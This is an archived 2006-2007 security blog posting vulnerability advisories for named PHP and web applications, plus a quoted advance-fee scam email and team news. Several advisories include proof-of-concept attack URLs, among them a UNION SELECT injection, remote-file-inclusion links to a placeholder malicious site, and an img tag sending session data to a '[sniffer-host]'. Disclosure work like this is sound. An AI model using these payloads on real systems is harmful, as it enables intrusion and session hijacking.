- UNSECURED SYSTEMS -

UNSECURED SYSTEMS vol.2 blog

noreply@blogger.com (der4444) — Thu, 17 May 2007 10:03:00 +0000

we have new blog pridels-team.blogspot.com
this blog will run only as archive, in new will be published fresh advisories and news from us.

DVDdb XSS vuln.

noreply@blogger.com (der4444) — Wed, 02 May 2007 16:17:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 2 May 2007
vendor:http://globalmegacorp.org/dvddb/
affected versions: 0.6 and previous
###############################################

DVDdb contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "movieid" parameter in "loan.php" and "s" parameter in "listmovies.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################

PHPChain vuln.

noreply@blogger.com (der4444) — Wed, 02 May 2007 16:10:00 +0000

PHPChain vuln.
###############################################
Vuln. discovered by : r0t
Date: 2 May 2007
vendor:http://www.globalmegacorp.org/PHPChain/
affected versions: 1.0 and previous
###############################################

PHPChain contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "catid" parameter in "settings.php" and in "cat.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Also there is full path disclosure , "attacker" will get full installisations path by testing XSS examples in vuln. parameters.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################

FileRun Vuln.

noreply@blogger.com (der4444) — Wed, 02 May 2007 02:24:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 2 May 2007
vendor:http://filerun.dreamhosters.com/
affected versions: 1.0 and previous
###############################################

1.
FileRun contains a flaw that allows a remote sql injection attacks.Input passed to the "fid" parameter isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
FileRun contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page","module","section" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################

AlstraSoft Video Share Enterprise - Information disclosure & SQL injection vuln

noreply@blogger.com (VietMafia) — Thu, 29 Mar 2007 11:32:00 +0000

============================
discovered by : VietMafia
developer's site: www.alstrasoft.com
script: AlstraSoft Video Share Enterprise
risk: medium
status: unpatched
============================

This script has a vuln which can be exploited by malicious people to disclose sensitive information & access to system as administrator.

1.The file siteadmin/useredit.php can be accessed without any authetication. User's info can be viewed & edited after that.

example:

http://host/path/siteadmin/useredit.php?uid=userid

2.SQL injection

after we got access as a registered user there's a sql inj vuln in msg.php file

poc : http://host/path/msg.php?id=-1%20union%20select%201,version(),1,1,1,1,1,1,1

thanks DH for helping me verify this. :)

===============================

come back

noreply@blogger.com (VietMafia) — Tue, 27 Mar 2007 08:34:00 +0000

Der4444,

check ur email krustevs at gmail. I dont see you on icq.

Vietmafia

Crash.

noreply@blogger.com (der4444) — Wed, 21 Feb 2007 18:34:00 +0000

Hello guys!
No new entries for long time , board is down more than half year.
Everthing looks dead, so it was also.
Lets say somebody from us had alot of jobs behind this scene other ones take some hollydays.
But now i think we can continue wht we had started.
I still miss contacts to Vietmafia and cembo,but guys if you read this post let me know if we can count of you in team.
Just mail me krustevs at gmail
or via icq 476010452

A Book A Day

noreply@blogger.com (cembo) — Tue, 29 Aug 2006 18:30:00 +0000

From this day forward you will be able to find a new e-book about programming, every day. They are posted at our forums. E-books about other topics coming soon as well.

PhpHostBot remote File Inclusion Vuln.

noreply@blogger.com (r0t) — Thu, 20 Jul 2006 03:06:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpHostBot.php
affected versions:PhpHostBot 1.0 / AutoHost 3.0
###############################################

Vulnerability Description:

PhpHostBot contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "order/index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/order/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

PhpLinkExchange remote File Inclusion Vuln.

noreply@blogger.com (r0t) — Thu, 20 Jul 2006 03:03:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpLinkExchange.php
affected versions: 1.0 and prior
###############################################

Vulnerability Description:

PhpLinkExchange contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

HiveMail vuln.

noreply@blogger.com (r0t) — Tue, 11 Jul 2006 12:56:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 11 july 2006
vendor:http://hivemail.com/
affected versions:
tested on 1.3 and 1.2 versions
other versions also can be affected.
###############################################

Vuln. Description:

1.
HiveMail contains a flaw that allows a remote sql injection attacks.Input passed to the "fields[]" parameter in "search.results.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
HiveMail contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "email","cond","name" parameters in "addressbook.view.php" and input passed to the "daysprune" parameter in "index.php" and input passed to the "data[to]" parameter in "compose.email.php" and input passed to the "markas" parameter in "read.markas.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

3.
It is also possible to disclose the full path to "search.results.php" by defining "searchdate" and "folderids" parameters.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Scamming

noreply@blogger.com (r0t) — Sat, 01 Jul 2006 12:44:00 +0000

Title:Please, I need to hear from you now

From:Dr. James Ransome
at:30. Juni 2006 09:06

Barclays Bank Plc
London, United Kingdom
I am Dr. James Ransome , Senior Credit Officer, Barclays Bank Plc London. I am writing following an opportunity in my office that will be of immense benefit to both of us.
In my department we discovered an abandoned sum of £12.5million British Pounds Sterling (Twelve Million Five Hundred Thousand British Pounds Sterling) in an account that belongs to one of our foreign customers Late Mr. Morris Thompson an American who unfortunately lost his life in the plane crash of Alaska Airlines
Flight 261, which crashed on January 31 2000, including his wife and only daughter. You shall read more about the crash on visiting this website.

Since we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because the Bank cannot release the funds unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines.
Unfortunately I learnt that his supposed next of kin being his only daughter died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. It is therefore upon this discovery that I and two other officials in this department now decided to do business with you and release the money to you as the next of kin or beneficiary of the funds for safe keeping and subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill.
We agreed that 20% of this money would be for you as foreign partner, while the balance will be for my colleagues and I. We will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. Please be honest to me as trust is our watchword in this transaction.
Note that this transaction is confidential and risk free. As soon as you receive this mail you should contact me by return mail whether or not you are willing to enter into this deal. In the event you are not interested, I sincerely ask that you disregard this email and tell no one about it. I am very careful on truncating my banking career should you mention this to someone else. I hope you can be trusted in this regard.
Please note that all necessary arrangement for the smooth release of these funds to you has been finalized. We will discuss much in details when I do receive your response.
Please in your response include your telephone and fax numbers for a better communication between us.
You can reach me on the email below
Best regards
James Ransome
Email: jamesransome20067@zonai.com

He he, first at all If some person will say that he works for some company, thats means thathe also will use that company´s email and not from "zonai.com"
But thats also not a point ,with emails there is alot of tricks how to survive .

Next point is how like in this example Brclays bank manager have my email?
Let me answer , my email you will become with spammers software like Mail grabber.

OK. that we everybody now, that money is stollen not from dead American person , but for normal live costumers from some ecommerce site on net or using some poor IE exploits to get they trojan on victims maschine.

For me is intrestnig, that point... if you will say that you had belived to those gangsters and they used your bank account for they illegal money transfers, than you are not guilty.

But lets say, that you belived to those gangsters , but you was to greedy to be happy with they offered 20% and you taked all money.

In both ways you will get in contact with your country law instances.

And guess wich way is better ?

Third one?

Multiple Browsers Information Disclosure vuln.

noreply@blogger.com (r0t) — Tue, 27 Jun 2006 19:20:00 +0000

Multiple Browsers Information Disclosure vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
###############################################

Vuln. Description:

Multiple Browsers contains a flaw which can be exploited by malicious people to disclose potentially sensitive information.
An error in the handling of redirections can be exploited to access documents served from another web site via the "object.documentElement.outerHTML" property.

Affected browsers:

MYweb4net Browser 3.8.8.0
http://www.mybrowser.web4net.net/

GreenBrowser 3.4.0622
http://www.morequick.com/

Maxthon v1.5.6 build 42
http://www.maxthon.com/

PhaseOut 5.4.4
http://www.phaseout.net/

FineBrowser Freeware version v3.2.2
http://www.finebrowser.com/

Slim Browser 4.07 build 100
http://www.flashpeak.com/

NetCaptor 4.5.7 Personal Edition
http://www.netcaptor.com/

Enigma Browser 3.8.8
http://www.suttondesigns.com/

Fast Browser Pro 8.1
http://fastbrowser.net/

GoSuRF Browser 2.62
http://gosurfbrowser.com/?ln=en

Previous versions off those browsers also can be affected.

Tested on Windows XP/SP2 and IE 6 ( some of those browsers use IE engine to run, but offcourse not vuln. IE 6.0 was used for that tests.)

note: This advisory is based on Plebo Aesdi Nael advisory in IE.

Reff url: http://secunia.com/advisories/20825/

###############################################
Solution:
Disable Active Scripting support.
###############################################
More information @ unsecured-systems.com/forum/

Hostflow vuln.

noreply@blogger.com (r0t) — Tue, 27 Jun 2006 13:49:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.hostflow.com/
affected versions:2.2.1-15 and previous
###############################################

Vuln. Description:

Hostflow contains a flaw which could allow a remote attacker to hijack user sessions. A remote attacker can retrieve the authentication information to hijack a user session if a user includes a URL link within a helpdesk message because in default there isn't IP address verification. This would allow the attacker to take control victims control panel.

example:

1.
post:
(img src="http://[sniffer-host]/r0t.gif" width="0" height="0")
note: change "(" to "<" and ")" to ">"

2. or it also will works with simple refferal url function.
For manual testing use html code and create hyperlink to resource wich will show you refferal url´s in example some hit counter or statistic apllication do it well.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

HSPcomplete vuln.

noreply@blogger.com (r0t) — Tue, 27 Jun 2006 04:31:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.swsoft.com/en/products/hspcomplete/
affected versions:3.2.2 , 3.3 Beta and prior
###############################################

Vuln. Description:

HSPcomplete contains a flaw that allows a remote sql injection attacks.Input passed to the "type" parameter in "report.php" and input passed to the "level" parameter in "custom_buttons.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

H-Sphere <=2.5.x XSS vuln.

noreply@blogger.com (r0t) — Tue, 27 Jun 2006 03:34:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.psoft.net/h_sphere2_info.html
affected versions:2.5.1 Beta 1 (2.5.1.801.20060621)
and previous
###############################################

Vuln. Description:

H-Sphere contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "next_template","start","curr_menu_id","arid" parameters isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP
?template_name=mailman/massmail.html&arid=46&curr_
menu_id=&start=&next_template=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP
?template_name=mailman/massmail.html&arid=46&curr_men
u_id=&start=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP
?template_name=mailman/massmail.html&arid=46&curr_me
nu_id=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.C
P?template_name=mailman/massmail.html&arid=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Zorum Forum <=3.5 vuln.

noreply@blogger.com (r0t) — Mon, 26 Jun 2006 19:01:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 26 june 2006
vendor:http://zorum.phpoutsourcing.com/
affected versions:3.5 and prior
###############################################

Vuln. Description:

1.
Zorum Forum contains a flaw that allows a remote sql injection attacks.Input passed to the "offset","tid","fromid","sortby","fromfrommethod","fromfromlist" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
Zorum Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "frommethod","list","method" parameter in "index.php" and most parameters from SQL injection vuln. isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Additional info:
Some of those parameters by both vulnerabilities will give Full Path Disclosure and there will be many other parameters wich isnt properly sanitised.
And if it will be not enough you can aslo figure out something like sql injection form search engine module, just try to add in any possible field some "unsanitised" input and you will see.

ref:
Zorum Arbitrary Command Execution and SQL Injection Vulnerabilities
Zorum forum 3.5 sql injection exploit

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Хакер (Андрей Житков)

noreply@blogger.com (r0t) — Mon, 26 Jun 2006 12:38:00 +0000

Он – хакер. Гений и хулиган. Его цель – взломать банковскую сеть и стать миллионером. Для него это не более чем компьютерная игра. Но вскоре он сам становится персонажем чьей-то совсем не виртуальной игры, а его друзья и знакомые погибают от настоящего, а не виртуального оружия…

Download

DeluxeBB <=1.07 XSS vuln.

noreply@blogger.com (r0t) — Sun, 25 Jun 2006 16:58:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.deluxebb.com/
affected versions:1.07 and prior
###############################################

Vuln. Description:

DeluxeBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "subject" and "to" parameter in "pm.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ICT - Infinite Core Technologies vuln.

noreply@blogger.com (r0t) — Sun, 25 Jun 2006 16:35:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.infinitecore.com/
affected versions:1.0 Gold and prior
###############################################

Vuln. Description:

ICT contains a flaw that allows a remote sql injection attacks.Input passed to the "post" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

OpenForum XSS vuln.

noreply@blogger.com (r0t) — Sun, 25 Jun 2006 15:45:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:www.2enetworx.com/dev/projects/openforum.asp
affected versions:1.2 Beta and prior
###############################################

Vuln. Description:

OpenForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "ofdisp" and "ofmsgid" parameter in "openforum.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

GL-SH Deaf Forum XSS vuln.

noreply@blogger.com (r0t) — Sun, 25 Jun 2006 01:38:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.frank-karau.de/
affected versions:6.4.3 and prior
###############################################

Vuln. Description:

GL-SH Deaf Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "sort" parameter in "show.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpQLAdmin vuln.

noreply@blogger.com (r0t) — Sat, 24 Jun 2006 22:57:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://phpqladmin.com
affected versions:2.2.x and previous
###############################################

Vuln. Description:

phpQLAdmin contains multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "domain" parameter in "user_add.php" and "unit_add.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

XennoBB XSS vuln.

noreply@blogger.com (r0t) — Sat, 24 Jun 2006 18:40:00 +0000

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.xennobb.com/
affected versions:1.0.5 and prior
###############################################

Vuln. Description:

XennoBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "tid" parameter in "messages.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

btw ...

noreply@blogger.com (r0t) — Sat, 24 Jun 2006 12:23:00 +0000

Somebody was asked to me why coments on this blog is "censured" - moderated.
Every day tehere are almost 50 spammers with comercial spam, like credit loans and other shit...im not suprissed cauz many of my reports/advisories are ecommerce webaplications.
To fight with spammers ..hm... if it was one ..it will be not so dificult , but ...
Any way spam sucks...

In my last post i told that i will not have time to publish advisories and report about unsecured systems and i told that i will post 10-15 and thats will be end and other guys or VietMafia will continue contribute blog with advisories.
IN place of 10-15 is more than 50 became , cauz VietMafia didnt .... So for me its to easy to do nothin, thats why i didnt stop..even my time is limited . I will continue so long as i can.

And again there is some developers (2 from 50) who are shocked that i didnt contacted them and reported about vuln.
I regullary try to do this in every 100 advisory i try, so no succesfull result till now, so why i must?
So i think that we stay in one point, i can do only my job wih success if you do mistakes, if you dont i can do my job.
Everyone have mistakes and im not better than you , its just my job to find out some mistakes.
In that point i wanna also say thanks to Secunia and OSVDB guys for support.

And till now i didnt wrote article about wich i had promissed to write,cauz im waiting when cembo will complete PVS-Pridels Vuln Scanner , if its will be great tool my meaning can change and content of article to, thats why i better wait.
And before it will be published i will try as alternative for my fingers... :)